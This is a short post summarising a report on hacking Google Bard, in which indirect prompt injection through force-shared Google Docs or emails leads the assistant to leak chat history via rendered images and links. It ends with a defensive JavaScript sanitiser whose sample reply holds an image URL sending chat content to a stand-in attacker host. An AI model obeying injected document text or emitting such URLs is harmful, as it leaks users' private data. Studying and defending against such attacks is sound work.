URGENT: Hacking Google Bard – From Prompt Injection to Data Exfiltration

Adding AI chatbots to existing systems increases their ‘attack surface’ – the range of possible cyberattacks. This report from Embrace the Red explores a new range of attacks that come from Google Bard’s close integration with Google Apps (Gmail, Docs, Drive, Sheets, etc.):

Indirect Prompt Injection attacks via Emails or Google Docs are interesting threats, because these can be delivered to users without their consent.

Imagine an attacker force-sharing Google Docs with victims!

When the victim searches or interacts with the attacker’s document using Bard, the prompt injection can kick in!

Scary stuff!

A common vulnerability in LLM apps is chat history exfiltration via rendering of hyperlinks and images. The question was, how might this apply to Google Bard?

The article goes on to show exactly how this applies to Google Bard.

Everyone using Google products should read this report.
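
A defensive take on the rendering issue quoted above, as an added example that is not from the Embrace the Red report or from Google: before a chat client renders model output, it removes Markdown images and de-links hyperlinks whose host is not on an allowlist, and records what it blocked for logging. The allowlist, host names and sample reply are constructed assumptions.

```javascript
// Added example: hosts and sample text below are constructed for illustration.
const ALLOWED_HOSTS = new Set(["docs.example.com"]); // assumption: deployer's allowlist

// Matches Markdown images ![alt](url) and links [text](url); group 1 is "!" for images.
const MD_REF = /(!?)\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)/g;

function hostOf(rawUrl) {
  try {
    const u = new URL(rawUrl);
    const web = u.protocol === "https:" || u.protocol === "http:";
    return web ? u.hostname.toLowerCase() : null;
  } catch {
    return null; // relative or malformed URL: treat as untrusted
  }
}

// Returns the text that is safe to render plus a list of what was neutralized,
// so blocked URLs can be logged and alerted on.
function sanitizeModelOutput(markdown, allowedHosts = ALLOWED_HOSTS) {
  const blocked = [];
  const text = markdown.replace(MD_REF, (match, bang, label, url) => {
    const host = hostOf(url);
    if (host !== null && allowedHosts.has(host)) return match; // exact host match only
    blocked.push({ kind: bang ? "image" : "link", url });
    // Images are fetched on render with no click, so drop them entirely;
    // for a link keep only the visible text.
    return bang ? "" : label;
  });
  return { text, blocked };
}

// Constructed model reply: injected instructions made the model append chat
// content to an image URL on a host the deployer does not control.
const sample =
  "Here is your summary. ![](https://attacker.example/log?q=user%20asked%20about%20payroll) " +
  "See [the doc](https://docs.example.com/d/123) or [more](https://other.example/x).";

const result = sanitizeModelOutput(sample);
console.log(result.text);
console.log(result.blocked);
```

Filtering at render time complements, and does not replace, a Content Security Policy that restricts where the page may load images from.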
